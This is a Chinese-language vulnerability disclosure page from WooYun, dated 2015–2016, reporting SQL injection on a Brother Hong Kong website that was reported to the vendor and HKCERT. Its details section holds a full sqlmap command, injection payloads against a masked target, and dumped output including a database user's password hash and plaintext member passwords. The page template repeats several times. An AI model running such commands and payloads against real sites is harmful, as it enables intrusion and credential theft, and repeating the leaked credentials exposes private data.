Brother香港某站存在SQL注射漏洞（DBA权限+系统管理员密码+用户明文密码）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158896

漏洞标题：Brother香港某站存在SQL注射漏洞（DBA权限+系统管理员密码+用户明文密码）（香港地區）

漏洞作者：路人甲

提交时间：2015-12-07 15:22

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-07：细节已通知厂商并且等待厂商处理中
2015-12-10：厂商已经确认，细节仅向厂商公开
2015-12-20：细节向核心白帽子及相关领域专家公开
2015-12-30：细节向普通白帽子公开
2016-01-09：细节向实习白帽子公开
2016-01-23：细节向公众公开

简要描述：

超過一個世紀，Brother的產品響譽盛名有口皆碑，成為創新產品和令客人滿意的代名詞。 Brother於1908年在日本成立，現在Brother已發展成在全球各地設有16個生產設施、51個銷售點，遍佈全球44個國家。
Brother為打印及影像、標籤和縫紉市場生產優質創新的產品，在業界一直佔有領先地位。主要產品包括打印機、多功能打印機、傳真機、掃瞄器、標籤機及一系列家用及商用縫紉機。 Brother作為一個全球信賴的品牌，一直在業務各方面都堅持「以客為先」的信念，更藉著全面而高質素的解決方案繼續迎合我們的客戶各式各樣的需要。

详细说明：

地址：http://**.**.**.**/en/news/news_detail.html?news=377

$ python sqlmap.py -u "http://**.**.**.**/en/news/news_detail.html?news=377" -p news --technique=BE --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass

current user:    'weboncms'
current user is DBA:    True
database management system users [1]:
[*] ppseal
database management system users password hashes:
[*] ppseal [1]:
    password hash: 0x010001f7f9482c5b7e14343e74d4562db6f18b80df86de88a9d7
        header: 0x0100
        salt: 01f7f948
        mixedcase: 2c5b7e14343e74d4562db6f18b80df86de88a9d7

Database: dbBrother_new
Table: cmsMembershipMember
[4 entries]
+-------------+
| strPassword |
+-------------+
| 000000      |
| 111111      |
| sckyip      |
| web-on      |
+-------------+

漏洞证明：

---
Parameter: news (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: news=377 AND 8201=8201
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: news=377 AND 2596=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (2596=2596) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'weboncms'
current user is DBA:    True
database management system users [1]:
[*] ppseal
database management system users password hashes:
[*] ppseal [1]:
    password hash: 0x010001f7f9482c5b7e14343e74d4562db6f18b80df86de88a9d7
        header: 0x0100
        salt: 01f7f948
        mixedcase: 2c5b7e14343e74d4562db6f18b80df86de88a9d7
columns LIKE 'pass' were found in the following databases:
Database: dbBrother_new
Table: cmsMembershipMember
[1 column]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| strPassword | varchar |
+-------------+---------+
Database: dbBrother_new
Table: cmsMembershipMember
[4 entries]
+-------------+
| strPassword |
+-------------+
| 000000      |
| 111111      |
| sckyip      |
| web-on      |
+-------------+

修复方案：

上WAF。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-12-10 18:59

厂商回复：

已將事件通知有關機構

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158896

漏洞标题：Brother香港某站存在SQL注射漏洞（DBA权限+系统管理员密码+用户明文密码）（香港地區）

相关厂商：Brother香港

漏洞作者：路人甲

提交时间：2015-12-07 15:22

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0158896

漏洞标题：Brother香港某站存在SQL注射漏洞（DBA权限+系统管理员密码+用户明文密码）（香港地區）

相关厂商：Brother香港

漏洞作者： 路人甲

提交时间：2015-12-07 15:22

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0158896"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云